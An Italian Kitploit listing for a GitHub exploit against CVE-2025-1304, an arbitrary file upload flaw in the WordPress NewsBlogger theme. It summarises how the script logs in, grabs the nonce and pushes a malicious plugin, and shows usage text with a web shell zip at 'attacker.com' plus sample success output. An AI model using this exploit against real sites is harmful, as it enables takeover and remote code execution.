Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1304 — Il tema WordPress NewsBlogger <= 0.2.5.1 è vulnerabile al caricamento arbitrario di file. | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-1304
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-1304

CVE-2025-1304

Il tema WordPress NewsBlogger <= 0.2.5.1 è vulnerabile al caricamento arbitrario di file.

Vedi Repository
211 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 Tema WordPress NewsBlogger <= 0.2.5.1 - Caricamento File Arbitrario (CVE-2025-1304)

Punteggio CVSS: 8.8 (Alto)
Tipo di Vulnerabilità: Caricamento File Arbitrario
Componente: Tema WordPress
ID CVE: CVE-2025-1304


🔥 Panoramica della Vulnerabilità

Il tema WordPress NewsBlogger (versioni <= 0.2.5.1) è vulnerabile a un Caricamento File Arbitrario tramite il pannello di benvenuto dell'amministrazione.

Questa vulnerabilità consente a qualsiasi utente autenticato — incluso chi dispone del ruolo minimo di Sottoscrittore — di caricare un archivio .zip dannoso contenente una web shell.
Il caricamento avviene tramite un campo URL del plugin non convalidato, che non verifica correttamente il contenuto o il tipo del file caricato.

Un attacco riuscito potrebbe portare al compromesso completo del sito web, inclusa l'esecuzione remota di comandi e l'escalation dei privilegi.


🧠 Dettagli dello Script

Questo script Python automatizza lo sfruttamento della vulnerabilità:

  • Accedendo con le credenziali amministrative fornite.
  • Estraendo dinamicamente il nonce dalla pagina di benvenuto vulnerabile.
  • Caricando un plugin remoto dannoso tramite l'endpoint AJAX vulnerabile.

  • ⚙️ Istruzioni per l'Uso

    root@kitploit:~
    python CVE-2025-1304.py -h
    
    root@kitploit:~
    usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
    
    WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
    
    options:
      -h, --help                show this help message and exit
      --url, -u URL             Target base URL (e.g., http://target/wordpress)
      --username, -un USERNAME WordPress admin username
      --password, -p PASSWORD   WordPress admin password
      --shellweb, -shell SHELLWEB
                               Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
    

    📤 Esempio di Output

    root@kitploit:~
    [+] Logging in to http://target/wordpress/wp-login.php
    [+] Logged in successfully.
    [+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
    [+] Extracted nonce: 012818100b
    [+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
    [+] Server response:
    {"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
    

    ⚠️ Disclaimer

    Questo codice è fornito esclusivamente per scopi di formazione e test di sicurezza autorizzati.
    L'autore non si assume alcuna responsabilità per un uso improprio o per danni causati da questo strumento.


    Di: Nxploited ( Khaled Alenazi )

    Scarica lo strumento